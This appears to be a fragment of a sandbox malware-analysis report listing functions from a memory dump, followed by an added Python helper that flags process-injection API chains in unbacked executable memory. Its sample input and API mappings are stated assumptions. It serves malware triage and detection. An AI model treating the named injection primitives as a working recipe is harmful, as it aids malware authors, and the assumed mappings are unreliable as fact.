• Instruction ID: 53e8f9af7dd84de8e6523fe38bfa636eb986896da282c42542038081e9e553e5
• Instruction Fuzzy Hash: 8351A574608B068FFB64EF28A8647BA77E1EB58355F25413DD446C22A2DE7CC9468F01
• Uniqueness Score: -1.00%

Function: CreateValue
• Memory Dump Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
• API ID: CreateValue
• String ID:
• API String ID: 2259555733-0
• Opcode ID (Opcode Fuzzy Hash): 535672abe70d0168ee810ee176c23215db19a3ba1e8f58e6fcab72b62e0214ff
• Instruction ID: 44fdc88b403980a4455a13d141b1be1f43504ea532124b705c6156a7a6eeabd8
• Instruction Fuzzy Hash: 1E21273461C74C8FE781EF68D858B9AB7E1FB98344F44092DE48AC3255EB78D544CB42
• Uniqueness Score: -1.00%

Function: Create
• Memory Dump Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID (Opcode Fuzzy Hash): 3a96c24ec20924aeac69af3be795014768ecc2de191383b8bce9cd8f3f8db1b1
• Instruction ID: 74086f3f4f8ec181c0a7c1092442e207b8b4f3a0145800bf02c121b811ce4a80
• Instruction Fuzzy Hash: 1511C834648B055FDB54EB5CA894769B7F1EBAC341F15042EE88DC33A1DA78C9418743
• Uniqueness Score: -1.00%

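The API IDs in the function list above (SectionView, MemoryVirtualWrite, Thread$ResumeSuspend, CreateQueueThreadUser) are the primitives of a remote-injection chain, and every one of them sits in the same memory dump: an RWX region at 0x19D8B7B0000 that is not backed by a PE. The Python below is an added triage helper, not Joe Sandbox code and not part of the report: it parses function blocks in the report's rendered layout, groups them by memory dump, decodes the dump name, and flags dumps whose API IDs cover the whole chain inside an unbacked RWX region. The expansion of Joe Sandbox's condensed API-ID tokens to Win32/Nt names and the interpretation of the dump-name fields (process index, base address, page protection) are this example's assumptions; the sample input is constructed from the entries above.

```python
import re
from collections import defaultdict

# Joe Sandbox condenses an API set into a token such as "Thread$ResumeSuspend".
# Expanding these tokens to Win32/Nt names is an assumption of this example,
# not a mapping the report page documents.
INJECTION_PRIMITIVES = {
    "map_section":    {"SectionView"},                                     # NtMapViewOfSection
    "write_memory":   {"MemoryVirtualWrite"},                              # NtWriteVirtualMemory
    "thread_control": {"Thread$ResumeSuspend", "CreateQueueThreadUser"},   # Suspend/ResumeThread, QueueUserAPC
}

# Assumed layout of the dump name "<index>.<round>.<ts>.<base>.<prot>.<type>.sdmp";
# the PAGE_* values are the documented Windows memory-protection constants.
PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# Constructed sample: four function blocks in the report's rendered layout.
SAMPLE = """\
Memory Dump Source
• Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
• API ID: SectionView
• Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Memory Dump Source
• Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
• API ID: MemoryVirtualWrite
• Opcode ID: 3c8ab56f3603755e988b26635f94d5e2d310067f79c5e42d2b82552f2c8fabb7
Memory Dump Source
• Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
• API ID: Thread$ResumeSuspend
• Opcode ID: ffbd531617e9de6398172a96c7478380edc2f1a6ff7c6ff8001d704803e1d92c
Memory Dump Source
• Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
• API ID: CreateQueueThreadUser
• Opcode ID: 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
"""

FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")
DUMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.[0-9A-Fa-f]+\."
                     r"([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$")


def parse_functions(text):
    """Split the rendered listing into one dict per function block."""
    funcs, cur = [], None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":      # each block starts here
            cur = {}
            funcs.append(cur)
            continue
        m = FIELD_RE.match(line) if cur is not None else None
        if m:
            key, val = m.group(1).strip(), m.group(2).strip()
            if key == "Source File":
                cur["based_on_pe"] = "based on PE: true" in val
                val = val.split(",", 1)[0]           # keep only the dump name
            cur[key] = val
    return funcs


def describe_dump(name):
    """Decode the dump-name fields (assumed layout, see DUMP_RE)."""
    m = DUMP_RE.match(name)
    if not m:
        return {"name": name}
    index, base, prot = m.groups()
    return {"name": name, "process_index": int(index, 16), "base": int(base, 16),
            "protection": PAGE_PROTECTION.get(int(prot, 16), hex(int(prot, 16)))}


def injection_coverage(funcs):
    """Which injection primitives occur among the blocks' API IDs."""
    apis = {f.get("API ID", "") for f in funcs}
    return {name: sorted(apis & toks) for name, toks in INJECTION_PRIMITIVES.items()}


def triage(text):
    """Group blocks by memory dump and flag dumps covering the full injection chain."""
    by_dump = defaultdict(list)
    for f in parse_functions(text):
        by_dump[f.get("Source File", "?")].append(f)
    out = {}
    for name, funcs in by_dump.items():
        info = describe_dump(name)
        cov = injection_coverage(funcs)
        # An RWX region with no PE header that also holds the injection
        # primitives is the profile of a manually mapped loader stage.
        info.update({
            "functions": len(funcs),
            "opcode_ids": sorted({f["Opcode ID"] for f in funcs if "Opcode ID" in f}),
            "coverage": cov,
            "injection_chain": all(cov.values()),
            "unbacked_rwx": info.get("protection") == "PAGE_EXECUTE_READWRITE"
                            and not any(f.get("based_on_pe") for f in funcs),
        })
        out[name] = info
    return out


if __name__ == "__main__":
    for name, info in triage(SAMPLE).items():
        print(name, info["injection_chain"], info["unbacked_rwx"], info["coverage"])
```

Run against a full report export the same way; a dump that reaches `injection_chain` and `unbacked_rwx` together is the one to carve and hash first, and its `opcode_ids` are the values to pivot on across other reports.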
                                                        Non-executed Functions